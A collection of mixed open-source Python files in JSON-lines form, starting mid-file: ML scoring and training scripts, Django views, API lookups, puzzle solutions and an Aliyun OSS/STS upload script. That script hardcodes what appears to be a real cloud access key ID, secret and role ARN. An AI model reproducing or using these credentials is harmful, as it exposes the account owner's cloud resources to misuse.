len(example_list[0]['ctxs_candidates'])\n        for entry in example_list:\n            assert len(entry['ctxs_candidates']) == num_candidates, f"{len(entry['ctxs_candidates'])}!={num_candidates}"\n\n            sorted_tuple = sorted(enumerate(entry['ctxs_candidates']), key=lambda x: x[1]['score'])\n            entry['ctxs_candidates'] = [i[1]['ctxs'] for i in sorted_tuple]\n            entry['ctxs'] = entry['ctxs_candidates'][0]  # set top-scored cand to ctxs\n            mrr += 1/([i[0] for i in sorted_tuple].index(0)+1)\n        logger.info(f"MRR: {mrr/len(example_list)}")\n\n        save_json(self.output_file, example_list)\n\n        for path in glob.glob(f"{self.output_file}tmp_*.bin"):\n            os.remove(path)\n\n\n@hydra.main(config_path="configs", config_name="scorer")\ndef main(cfg):\n    logger.info(cfg)\n    set_seed(43)\n    accelerator = Accelerator()\n    scorer = Scorer(cfg, accelerator)\n\n    scorer.forward()\n    accelerator.wait_for_everyone()\n    if accelerator.is_main_process:\n        scorer.write_results()\n\n\nif __name__ == "__main__":\n    main()\n","repo_name":"HKUNLP/icl-ceil","sub_path":"scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"36895137435","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport subprocess\nimport sys\n\nfrom azure.cosmos import CosmosClient, PartitionKey, exceptions\nimport argparse\nimport urllib3\nfrom contextlib import contextmanager\n\n@contextmanager\ndef disable_ssl_warnings():\n    import warnings\n    import urllib3\n\n    with warnings.catch_warnings():\n        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n        yield None\n\n"""\nThe code below disables SSL Cert verification\nIt's only meant to be used with Cosmos Emulator\nCareful when using it with Azure Cosmos in production\n""" \n\ndef arg_parser():\n    parser = argparse.ArgumentParser("cosmos-emulator-init")\n    parser.add_argument("--key", "-k", required=True)\n    parser.add_argument("--url", "-u", required=True)\n    parser.add_argument("--emulate","-e", default=False, action="store_true")\n    return parser\n\nargs = arg_parser().parse_args()\n\nKEY=args.key\nURL=args.url\nconnection_verify=not args.emulate\n\n# For local emulator\nif connection_verify is False:\n    \n    warning="BEWARE: SSL verification and warnings are disabled for emulator"\n    print(warning,file=sys.stderr)\n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclient = CosmosClient(URL, credential=KEY, connection_verify=connection_verify)\n\n# Create LodeRunner db and container\n# CosmosDB values should be in sync with cosmos-create.sh\ndb_cont = {"LodeRunnerDB": "LodeRunner", "LodeRunnerTestDB": "LodeRunner"}\n\nfor db_name in db_cont:\n    cont_name = db_cont[db_name]\n    try:\n        db = client.create_database(id=db_name)\n        cont = db.create_container(\n            id=cont_name, partition_key=PartitionKey(path="/partitionKey")\n        )\n        print(f"Created DB: {db_name}, Container: {cont_name}")\n    except exceptions.CosmosResourceExistsError:\n        print(f'{db_name}/{cont_name} already exists')\n    except Exception:\n        raise\n","repo_name":"retaildevcrews/loderunner","sub_path":".devcontainer/cosmos-emulator/cosmos-emulator-init.py","file_name":"cosmos-emulator-init.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23824430236","text":"# -*- coding:utf-8 -*-\nimport json\nimport os\n\nimport oss2\n\nfrom aliyunsdkcore import client\nfrom 
aliyunsdkcore.profile import region_provider\nfrom aliyunsdksts.request.v20150401 import AssumeRoleRequest\n\n## define some variables\naccess_key_id = 'LTAI4FoMe6umpCSFQdEC9neg' \naccess_key_secret = 'jgEvtFOqIAGqKZve7zMvg8dJhSZv9J'\nbucket_name = 'fralychen'\nendpoint = 'oss-cn-hongkong.aliyuncs.com'\nsts_role_arn = 'acs:ram::1149877324567510:role/testrole'\n\n\n\n# make sure all of the parameters above are filled in correctly\nfor param in (access_key_id, access_key_secret, bucket_name, endpoint, sts_role_arn):\n    assert '<' not in param, 'please set the parameter: ' + param\n\n# create the StsInfo class to hold the temporary user's credentials\nclass StsInfo(object):\n    """Temporary user credentials returned by AssumeRole\n    :param str access_key_id: the temporary user's access key id\n    :param str access_key_secret: the temporary user's access key secret\n    :param int expiration: expiration time, UNIX time in seconds since 1970-01-01 00:00 UTC\n    :param str security_token: the temporary user's token\n    :param str request_id: request ID\n    """\n    def __init__(self):\n        self.access_key_id = ''\n        self.access_key_secret = ''\n        self.expiration = 0\n        self.security_token = ''\n        self.request_id = ''\n\n# in the console, grant the AliyunSTSAssumeRoleAccess permission to the sub-user testRole; testRole then calls the AssumeRole API to obtain temporary user credentials\ndef fetch_sts_info(access_key_id, access_key_secret, sts_role_arn):\n    """Have the sub-user assume the role to obtain temporary credentials\n    :param access_key_id: the sub-user's access key id\n    :param access_key_secret: the sub-user's access key secret\n    :param sts_role_arn: the Arn of the STS role\n    :return StsInfo: object holding the authorized user's credentials\n    """\n    # configure the STS endpoint to access\n    _REGIONID = 'cn-hongkong'\n    _ENDPOINT = 'sts.cn-hongkong.aliyuncs.com'\n    region_provider.add_endpoint('Sts', _REGIONID, _ENDPOINT)\n\n    clt = client.AcsClient(access_key_id, access_key_secret, 'cn-hongkong')\n    request = AssumeRoleRequest.AssumeRoleRequest()\n\n    #request.set_accept_format('json')\n    # specify the role ARN\n    request.set_RoleArn(sts_role_arn)\n    # set the session name; the audit service uses it to distinguish callers\n    request.set_RoleSessionName('oss-python-sdk-example')\n    # set the expiration time of the temporary identity\n    request.set_DurationSeconds(DurationSeconds)\n    # send the request and get the response\n    response = clt.do_action_with_exception(request)\n    # parse the returned string into a dict\n    i = json.loads(oss2.to_unicode(response))\n    # instantiate StsInfo and store the temporary user info on the object\n    global StsInfo\n    StsInfo = StsInfo()\n    StsInfo.access_key_id = i['Credentials']['AccessKeyId']\n    StsInfo.access_key_secret = i['Credentials']['AccessKeySecret']\n    StsInfo.security_token = i['Credentials']['SecurityToken']\n    StsInfo.request_id = i['RequestId']\n    StsInfo.expiration = oss2.utils.to_unixtime(i['Credentials']['Expiration'], '%Y-%m-%dT%H:%M:%SZ')\n    \n\n    # persist the temporary user info\n    save_info()\n\n\n# upload a file to the bucket as the STS-authorized temporary user\ndef buck_put_object(sts_key_id, sts_key_secret, sts_secrity_token):\n    """Upload a string to the object\n    :param sts_key_id: the temporary identity's access key id\n    :param sts_key_secret: the temporary identity's access key secret\n    :param sts_secrity_token: the temporary identity's security token\n    :return:\n    """ \n    # instantiate the Bucket object and upload the string\n    auth = oss2.StsAuth(sts_key_id, sts_key_secret, sts_secrity_token)\n    bucket = oss2.Bucket(auth,endpoint,'fralychen')\n    result = bucket.put_object('fralychen','good good study day day up')\n\n# if needed, the temporary credentials can be cached in a json file and only re-requested after they expire, avoiding repeated requests and a flood of temporary users\ndef save_info():\n    # store the temporary identity info\n    with open('StsInfo.json','w',encoding='utf-8') as f:\n        data = {'sts_key_id':StsInfo.access_key_id,'sts_key_secret':StsInfo.access_key_secret,'sts_secrity_token':StsInfo.security_token,'sts_expire_date':StsInfo.expiration,'sts_reques_id':StsInfo.request_id}\n        json.dump(data,f,ensure_ascii=False)\n\n\ndef open_info():\n    # read the temporary identity info\n    with open('./StsInfo.json','r',encoding='utf-8') as f:\n        global STSINFO\n        STSINFO = json.load(f)\n    return STSINFO\n\n\n# expiration time (seconds) of the temporary identity\nDurationSeconds = 900\n\ntry:\n    open_info()\nexcept IOError:\n    print("Error: no credential info file or it could not be read")\n    
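# no cached credential file yet: fetch fresh temporary credentials and cache them locally\n    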
print("Initializing identity info, storing temporary credentials....")\n    fetch_sts_info(access_key_id, access_key_secret, sts_role_arn)\n    print("Temporary credentials stored in StsInfo.json in the current directory")\nelse:\n    # the cached token is only usable while the current time is before its expiry\n    if oss2.utils.http_to_unixtime(oss2.utils.http_date()) < STSINFO["sts_expire_date"]:\n        buck_put_object(sts_key_id = STSINFO["sts_key_id"],sts_key_secret = STSINFO["sts_key_secret"], sts_secrity_token = STSINFO["sts_secrity_token"])\n        print("Upload succeeded, good_lucky")\n    else:\n        print("Refreshing temporary user info, please wait")\n        fetch_sts_info(access_key_id, access_key_secret, sts_role_arn)\n        open_info()\n        buck_put_object(sts_key_id = STSINFO["sts_key_id"],sts_key_secret = STSINFO["sts_key_secret"], sts_secrity_token = STSINFO["sts_secrity_token"])\n        print("Upload succeeded, good_lucky")\n\n\n","repo_name":"PyMt/PyMt","sub_path":"STS.py","file_name":"STS.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26268566923","text":"import requests\nimport datetime\nimport traceback\n\ndef get_user_data(nip):\n    \n    url_id = f"https://dane.biznes.gov.pl/api/mswf/v1/SearchAdvance?nip={nip}&pageNumber=0&pageSize=20"\n\n    res = requests.get(url_id)\n\n    if res.status_code == 200:\n        json_data = res.json()\n        id = json_data['companyList'][0]['id']\n        date = json_data['companyList'][0]['registerDate']\n    else:\n        traceback.print_exc() \n        raise Exception("Error")\n\n    url_data = f"https://dane.biznes.gov.pl/api/mswf/v1/GetCompanyDetails?id={id}"\n\n    res_data = requests.get(url_data)\n\n    if res_data.status_code == 200:\n        data = res_data.json()\n        \n        user_data = { "Name": data['basicData']['name'],\n                    "Address": f"{data['addressData']['correspondenceAddress']['street']} {data['addressData']['correspondenceAddress']['buildingNumber']}, {data['addressData']['correspondenceAddress']['apartmentNumber']}",\n                    "City": data['addressData']['correspondenceAddress']['city'] ,\n                    "REGON": data['basicData']['regon'],\n                    "Date": date }\n    else:\n        traceback.print_exc() \n        raise Exception("Error")\n\n    # user_data = {\n    #     "Name": "Artsiom Karatai",\n    #     "Address": f"Małopanewska 4, 8/1",\n    #     "City": "Wrocław",\n    #     "REGON": "521921834",\n    #     "Date": "2022-05-02"\n    # }\n\n    return user_data\n\ndef get_gabinet_data(nip):\n\n    today = datetime.date.today()\n\n    date = today.strftime('%Y-%m-%d')\n    \n    url = f"https://wl-api.mf.gov.pl/api/search/nip/{nip}?date={date}"\n\n    res = requests.get(url)\n\n    if res.status_code == 200:\n        data = res.json()\n        if data['result']['subject'] is None:\n            url_id = 
f\"https://dane.biznes.gov.pl/api/mswf/v1/SearchAdvance?nip={nip}&pageNumber=0&pageSize=20\"\n res = requests.get(url_id)\n if res.status_code == 200:\n krs = json_data['companyList'][0]['krs']\n url_data = f\"https://api-krs.ms.gov.pl/api/krs/OdpisAktualny/{krs}?rejestr=P&format=json\"\n res_data = requests.get(url_data)\n if res_data.status_code == 200:\n data = res_data.json()\n user_data = { \"Name\": data[\"odpis\"][\"dane\"][\"dzial1\"][\"danePodmiotu\"][\"nazwa\"],\n \"NIP\": nip,\n \"REGON\": data['odpis']['dane']['dzial1']['danePodmiotu']['identyfikatory']['regon'],\n \"Address\": f\"{data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['ulica']} {data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['nrDomu']}, {data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['kodPocztowy']} {data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['miejscowosc']}\"}\n return user_data\n else:\n traceback.print_exc() \n raise Exception(\"Error\")\n else:\n if data['result']['subject']['workingAddress'] != None:\n address = data['result']['subject']['workingAddress']\n else:\n address = data['result']['subject']['residenceAddress']\n gabinet_data = { \"Name\": data['result']['subject']['name'],\n \"NIP\": nip,\n \"REGON\": data['result']['subject']['regon'],\n \"Address\": address }\n return gabinet_data\n else:\n traceback.print_exc() \n raise Exception(\"Error\")\n\n# # gabinet_data = { \"Name\": \"Company name\",\n# # \"NIP\": nip,\n# # \"REGON\": \"2022-05-02\",\n# # \"Address\": \"Małopanewska 4, 8/1 Białystok\" }\n# return gabinet_data\n\n\n","repo_name":"YahorNovik/bot","sub_path":"bot/parser_folder/parser_code.py","file_name":"parser_code.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6626248798","text":"# exercise here\nimport sys\nfrom functools import reduce\n\n\ndef counter():\n print(list(zip(sys.argv[1:], map(count_lines_in_file, sys.argv[1:]))))\n print(\"The total number of lines is {}\".format(total_lines()))\n\n\ndef count_lines_in_file(filename):\n \"\"\"\n Counts the number of lines in a file.\n \"\"\"\n try:\n with open(filename) as f:\n return len(f.readlines())\n except FileNotFoundError:\n print(\"File is not exist!\")\n return -1\n\n\ndef total_lines():\n \"\"\"\n Counts the number of lines in all files.\n \"\"\"\n return reduce(lambda x, y: x + y, list(map(count_lines_in_file, sys.argv[1:])))\n\n\nif __name__ == '__main__':\n counter()\n","repo_name":"exba99/ShakespeareProject","sub_path":"countlines.py","file_name":"countlines.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32090445090","text":"from django.shortcuts import render\nimport cx_Oracle\nfrom django.db import transaction,connections\nfrom datetime import datetime\nfrom django.http import HttpResponseRedirect,JsonResponse,HttpResponse\nfrom django.contrib.auth import login as auth_login,logout,authenticate\nfrom django.urls import reverse\nfrom django.shortcuts import render,redirect\nfrom app_cc.models import *\n\n# Create your views here.\ndef login(request):\n\tmensaje = ''\n\tif request.user.is_authenticated:\n\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\t\n\tif request.method == 'POST':\n\t\tusername = request.POST.get('usuario')\n\t\tcontrasenia = request.POST.get('contrasenia')\n\t\tuser = 
authenticate(username=username,password=contrasenia)\n\t\tif user is not None:\n\t\t\tif user.is_active:\n\t\t\t\tauth_login(request,user)\n\t\t\t\treturn redirect('app_cc:lista_colaborador')\n\t\t\telse:\n\t\t\t\tmensaje = 'USUARIO INACTIVO'\n\t\t\t\treturn render(request,'login.html',{'mensaje':mensaje})\n\t\telse:\n\t\t\tmensaje = 'USUARIO O CONTRASEÑA INCORRECTA'\n\t\t\treturn render(request,'login.html',{'mensaje':mensaje})\n\treturn render(request,'login.html',{'mensaje':mensaje})\n\ndef cerrar_sesion(request):\n\tlogout(request)\n\treturn HttpResponseRedirect(reverse('app_cc:login'))\n\n\ndef index(request):\n\tconsulta = Colaborador.objects.all()\n\tgeneros = Genero.objects.all()\n\tdata = {'lista_colaborador':consulta,'generos':generos}\n\treturn render(request, \"index.html\",data)\n# try:\n# conexion=cx_Oracle.connect(\"jaguaroracle\", \"Jaguar2021\", \"173.249.59.89:1521/xe\")\n# except Exception as error:\n# print (\"nel .Error: \"+error)\n# else: \n# print(\"Si!!!!\")\n\ndef lista_colaborador(request):\n\tconsulta = Colaborador.objects.all()\n\tgeneros = Genero.objects.all()\n\tdata = {'lista_colaborador':consulta,'generos':generos}\n\treturn render(request,'index.html',data)\n\n\ndef registrar_colaborador(request):\n\tguardar_editar = True\n\tgeneros = Genero.objects.all()\n\tret_data,query_colaborador,errores = {},{},{}\n\n\tif request.method == 'POST':\n\t\tprint(\"ESTAMOS EN EL METODO POST\")\n\t\tret_data['identificacion'] = request.POST.get('identificacion')\n\t\tret_data['nombres'] = request.POST.get('nombres')\n\t\tret_data['apellidos'] = request.POST.get('apellidos')\n\t\tret_data['telefono'] = request.POST.get('telefono')\n\t\tret_data['fecha_nacimiento'] = request.POST.get('fecha_nacimiento')\n\t\tret_data['genero'] = int(request.POST.get('genero'))\n\t\tif request.POST.get('identificacion') == '':\n\t\t\terrores['identificacion'] = \"DEBES INGRESAR LA IDENTIDAD\"\n\t\telse:\n\t\t\tquery_colaborador['identificacion'] = request.POST.get('identificacion')\n\t\t\n\t\tif request.POST.get('nombres') == '':\n\t\t\terrores['nombres'] = \"DEBES INGRESAR NOMBRES\"\n\t\telse:\n\t\t\tquery_colaborador['nombres'] = request.POST.get('nombres')\n\n\t\tquery_colaborador['apellidos'] = request.POST.get('apellidos')\n\t\tquery_colaborador['telefono'] = request.POST.get('telefono')\n\t\tquery_colaborador['fecha_nacimiento'] = request.POST.get('fecha_nacimiento')\n\t\tquery_colaborador['Genero'] = Genero.objects.get(pk=request.POST.get('genero'))\n\n\t\tif not errores:\n\t\t\ttry:\n\t\t\t\tcolaborador = Colaborador(**query_colaborador)\n\t\t\t\tcolaborador.save()\n\t\t\texcept Exception as e:\n\t\t\t\ttransaction.rollback()\n\t\t\t\tprint (e)\n\t\t\t\terrores['administrador'] = e\n\t\t\t\tctx = {'generos':generos,\n\t\t\t\t\t\t'errores':errores,\n\t\t\t\t\t\t'ret_data':ret_data,\n\t\t\t\t\t\t'guardar_editar':guardar_editar}\n\t\t\t\treturn render(request,'registrar_colaborador.html',ctx)\n\t\t\telse:\n\t\t\t\ttransaction.commit()\n\t\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\t\telse:\n\t\t\tctx = {'generos':generos,\n\t\t\t\t\t'errores':errores,\n\t\t\t\t\t'ret_data':ret_data,\n\t\t\t\t\t'guardar_editar':guardar_editar}\n\t\t\treturn render(request,'registrar_colaborador.html',ctx)\n\telse:\n\t\tprint(\"ESTAMOS EN EL METODO GET\")\n\t\tctx = {'generos':generos,'guardar_editar':guardar_editar}\n\t\treturn render(request,'registrar_colaborador.html',ctx)\n\ndef eliminar_colaborador(request,id_colaborador):\n\teliminar = 
Colaborador.objects.get(pk=id_colaborador).delete()\n\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\ndef modificar_colaborador(request,id_colaborador):\n\tconsulta = Colaborador.objects.all()\n\tgeneros = Genero.objects.all()\n\tguardar_editar = False\n\tcolaborador = Colaborador.objects.get(pk=id_colaborador)\n\tret_data,query_colaborador,errores = {},{},{}\n\n\tif request.method=='POST':\n\t\tprint(\"aqui va modificar\")\n\n\t\tif request.POST.get('identificacion') == '' or request.POST.get('nombres') == '' or request.POST.get('apellidos') == '' or request.POST.get('telefono') == '' or request.POST.get('fecha_nacimiento') == '' or int(request.POST.get('genero')) == 0:\n\t\t\terrores['identificacion'] = \"HAY ERRORES\"\n\n\t\tif not errores:\n\t\t\t\n\t\t\ttry:\n\t\t\t\tcolaborador = Colaborador.objects.filter(pk=id_colaborador).update(identificacion=request.POST.get('identificacion'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnombres=request.POST.get('nombres'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tapellidos=request.POST.get('apellidos'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttelefono=request.POST.get('telefono'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfecha_nacimiento=request.POST.get('fecha_nacimiento'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tGenero=request.POST.get('genero')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e )\n\t\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador')+\"?error\")\n\t\t\telse:\n\t\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n\t\telse:\n\t\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador')+\"?error\")\n\telse:\n\t\treturn HttpResponseRedirect(reverse('app_cc:lista_colaborador'))\n","repo_name":"AndreaOrt/proyecto_cc","sub_path":"app_cc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38687855656","text":"from socket import *\r\nfrom constCS import *\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\n\r\ndata = s.recv(1024)\r\nprint(bytes.decode(data))\r\n\r\nwhile True:\r\n cmd = input()\r\n if cmd == 'sair': break\r\n\r\n s.send(str.encode(cmd))\r\n data = s.recv(1024)\r\n print(bytes.decode(data))\r\n \r\ns.close()","repo_name":"DistributedSystems-UFG/client-server-basics----with-sockets-VictorGNetto","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32313034481","text":"#!/usr/bin/env python\n\nimport mpl_toolkits # import before pathlib\nimport sys\nimport pathlib\nimport gc\nfrom typing import Optional\n\nfrom sklearn.neighbors import NearestNeighbors\nfrom tensorflow import set_random_seed\n\n# sys.path.append(pathlib.Path(__file__).parent)\nfrom train_utils import *\nfrom model import *\nfrom dataset import *\n\nnp.random.seed(RANDOM_NUM)\nset_random_seed(RANDOM_NUM)\n\nOUTPUT_FILE = 'test_dataset_prediction.txt'\n\n# BASE_MODEL = 'vgg19'\n# BASE_MODEL = 'incepstionresnetv2'\n# BASE_MODEL = 'resnet50'\n# BASE_MODEL = 'resnet152'\n# BASE_MODEL = 'adams'\n# BASE_MODEL = 'michel'\n# BASE_MODEL = 'mobilenet'\n# BASE_MODEL = 'local'\n# BASE_MODEL = 'giim'\n# BASE_MODEL = 'siamese'\n# BASE_MODEL = 'triplet_loss'\nBASE_MODEL = 'martine'\nif BASE_MODEL == 'resnet50':\n create_model = create_model_resnet50_plain\nelif 
BASE_MODEL == 'resnet152':\n create_model = create_model_resnet152_plain\nelif BASE_MODEL == 'incepstionresnetv2':\n create_model = create_model_inceptionresnetv2_plain\nelif BASE_MODEL == 'mobilenet':\n create_model = create_model_mobilenet\nelif BASE_MODEL == 'giim':\n create_model = create_model_giim\nelif BASE_MODEL == 'siamese':\n create_model = create_model_siamese\nelif BASE_MODEL == 'siamese_resnet':\n create_model = create_model_siamese_resnet\nelif BASE_MODEL == 'triplet_loss':\n create_model = create_model_triplet_loss\nelif BASE_MODEL == 'martine':\n create_model = create_martine_model\nelse:\n raise Exception(\"unimplemented model\")\n\n\ndef test(dataset: Optional[Dataset], model: Optional[Model]):\n if dataset is None:\n dataset = load_raw_data()\n test_dataset = load_test_data()\n weight_param_path = f\"model/{BASE_MODEL}.weights.best.hdf5\"\n if model is None:\n model = create_model(dataset=dataset, input_shape=(IMAGE_SIZE, IMAGE_SIZE, IMAGE_DIM))\n model = build_model(model, weight_param_path)\n train_preds = []\n train_data_list = []\n for data_unit in dataset.data_list:\n if data_unit.answer == NEW_LABEL:\n continue\n x = create_unit_dataset(dataset, data_unit)\n predicts = model.submodel.predict([x])\n predicts = predicts.tolist()\n train_preds += predicts\n train_data_list.append(data_unit)\n train_preds = np.array(train_preds)\n print(f\"train_preds:{train_preds.shape}\")\n print(f\"train_preds:{train_preds}\")\n\n test_preds = []\n test_data_list = []\n for data_unit in test_dataset.data_list:\n x = create_unit_dataset(dataset, data_unit)\n predicts = model.submodel.predict(x)\n predicts = predicts.tolist()\n test_preds += predicts\n test_data_list.append(data_unit)\n test_preds = np.array(test_preds)\n print(f\"test_preds: {test_preds.shape}\")\n print(f\"test_preds:{test_preds}\")\n\n neigh = NearestNeighbors(n_neighbors=6)\n neigh.fit(train_preds)\n # distances, neighbors = neigh.kneighbors(train_preds)\n # print(distances, neighbors)\n distances_test, neighbors_test = neigh.kneighbors(test_preds)\n distances_test, neighbors_test = distances_test.tolist(), neighbors_test.tolist()\n\n df = pd.DataFrame([], columns=['Image', 'Id'])\n for data_unit, distance, neighbour_ in zip(test_data_list, distances_test, neighbors_test):\n sample_result = []\n sample_classes = []\n for d, n in zip(distance, neighbour_):\n train_data_unit = train_data_list[n]\n sample_classes.append(train_data_unit.answer)\n sample_result.append((train_data_unit.answer, d))\n\n if NEW_LABEL not in sample_classes:\n # pbr\n # sample_result.append((NEW_LABEL, 0.0002))\n # alpha\n sample_result.append((NEW_LABEL, 27))\n sample_result.sort(key=lambda x: x[1])\n print(f\"sample:{sample_result}\")\n sample_result = sample_result[:5]\n pred_str = \" \".join([x[0] for x in sample_result])\n df = df.append(pd.DataFrame([[data_unit.filename, pred_str]], columns=['Image', 'Id']),\n ignore_index=True)\n df.to_csv(OUTPUT_FILE, index=False)\n\n\ndef main():\n dataset = load_raw_data()\n\n print(f\"class_num:{dataset.class_num}\")\n weight_param_path = f\"model/{BASE_MODEL}.weights.best.hdf5\"\n model = create_model(dataset=dataset, input_shape=(IMAGE_SIZE, IMAGE_SIZE, IMAGE_DIM))\n model = build_model(model, weight_param_path)\n # model = create_martine_model()\n for i in range(0, 1):\n print(f\"num:{i}. 
start train\")\n train_model(model, dataset, weight_param_path)\n model.save(weight_param_path)\n test(dataset, model)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"photom/histopathologic_cancer_detection","sub_path":"src/trainer_martine.py","file_name":"trainer_martine.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39728495650","text":"#!/usr/bin/env python3\n#\n#euler39 / Integer right triangles\nresult_max=0\np_max=0\nfor p in range(1,1001):\n result=0\n for a in range(1,p):\n for b in range(a,p):\n if a**2+b**2==(p-a-b)**2:\n result+=1\n print(a,b,p-a-b,p)\n if result > result_max:\n result_max=result\n p_max=p\nprint(p_max,result_max)\n","repo_name":"allagonne/Euler_project","sub_path":"euler39.py","file_name":"euler39.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33228011187","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.dashboard, name=\"dashboard\"),\n path('loginteacher/', views.loginPageT, name=\"login\"),\n path('logout/', views.logoutUser, name=\"logout\"),\n\n \n path('teacher/',views.teacher, name=\"teacher\"),\n path('add_lang/',views.addLang, name=\"add_lang\"),\n path('create_group/',views.createGroupView, name=\"create_group\"),\n path('Updatestudent/',views.updateStudentView, name=\"Updatestudent\"),\n\n path('registerteacher/', views.registerPageT, name=\"registerteacher\"),\n path('registerstudent/',views.registerPageS, name=\"registerstudent\"),\n path('assginstudent/',views.assginStudent, name=\"assginstudent\"),\n \n path('teacher_group/',views.group, name=\"teacher_group\"),\n path('studentslist/',views.groupStudentsAPI), \n path('student_present/',views.studentPresent), \n path('student_absent/',views.studentAbsent), \n path('sub_session/',views.sessionSub), \n\n\n path('student_search/',views.studentSearch, name=\"student_search\"),\n \n \n \n \n \n \n\n ]","repo_name":"toufik2015/sapp","sub_path":"SAPP/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25319970706","text":"# is one range inside of the other?\n# start has to be greater than or equal\n# end has to be less than or equal\n\n# determine which of the pair has the greater start:\n# does it come on or before the other's end?\n# is its end it less than or equal to the other's end?\n\n# if starts or finish are the same, one will contain the other no matter what\n\nwastedAssignments = 0\n\nwith open('input.txt') as inputFile:\n for assignments in inputFile:\n [a, b] = assignments.split(',')\n a = list(map(int, a.split('-')))\n b = list(map(int, b.split('-')))\n if a[0] == b[0] or a[1] == b[1]:\n wastedAssignments += 1\n else:\n firstAssignment = a\n secondAssignment = b\n if a[0] > b[0]:\n firstAssignment = b\n secondAssignment = a\n\n firstAssignmentLength = (firstAssignment[1] - firstAssignment[0])\n secondAssignmentLength = (secondAssignment[1] - secondAssignment[0])\n startGap = secondAssignment[0] - firstAssignment[0]\n \n if (secondAssignment[0] < firstAssignment[1]) and (firstAssignmentLength - startGap >= secondAssignmentLength):\n wastedAssignments += 
1\n\nprint(wastedAssignments)","repo_name":"tonymckendry/AdventOfCode2022","sub_path":"day4/day4Pt1.py","file_name":"day4Pt1.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10381386508","text":"import glob \nimport os\nimport numpy as np\n\nclass Loader:\n def __init__(self, data_dir):\n self.data_dir = data_dir\n\n def convert_to_time(self, tstamp):\n tstamp = tstamp.split(':')\n return float(tstamp[0])*3600 + float(tstamp[1])*60 + float(tstamp[2])\n\n def iterate(self):\n with open(os.path.join(self.data_dir, 'num_files')) as f:\n num_files = int(f.readline())\n\n for i in xrange(num_files):\n feats = np.load(os.path.join(self.data_dir, 'feats{}.npy'.format(i)))\n labels = np.load(os.path.join(self.data_dir, 'labels{}.npy'.format(i)))\n feats = np.expand_dims(feats, 0)\n yield feats, labels\n","repo_name":"kalpitdixit/ACM","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39511278149","text":"from django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom posthog.demo.legacy import ORGANIZATION_NAME, TEAM_NAME, create_demo_data\nfrom posthog.models import (\n EventProperty,\n PersonalAPIKey,\n Plugin,\n PluginConfig,\n PluginSourceFile,\n Team,\n User,\n)\nfrom posthog.models.event_definition import EventDefinition\nfrom posthog.models.personal_api_key import hash_key_value\nfrom posthog.models.property_definition import PropertyDefinition\n\n\nclass Command(BaseCommand):\n help = \"Set up the instance for development/review with demo data\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"--no-data\", action=\"store_true\", help=\"Create demo account without data\")\n parser.add_argument(\n \"--create-e2e-test-plugin\",\n action=\"store_true\",\n help=\"Create plugin for charts E2E test\",\n )\n\n def handle(self, *args, **options):\n print(\"\\n⚠️ setup_dev is deprecated. 
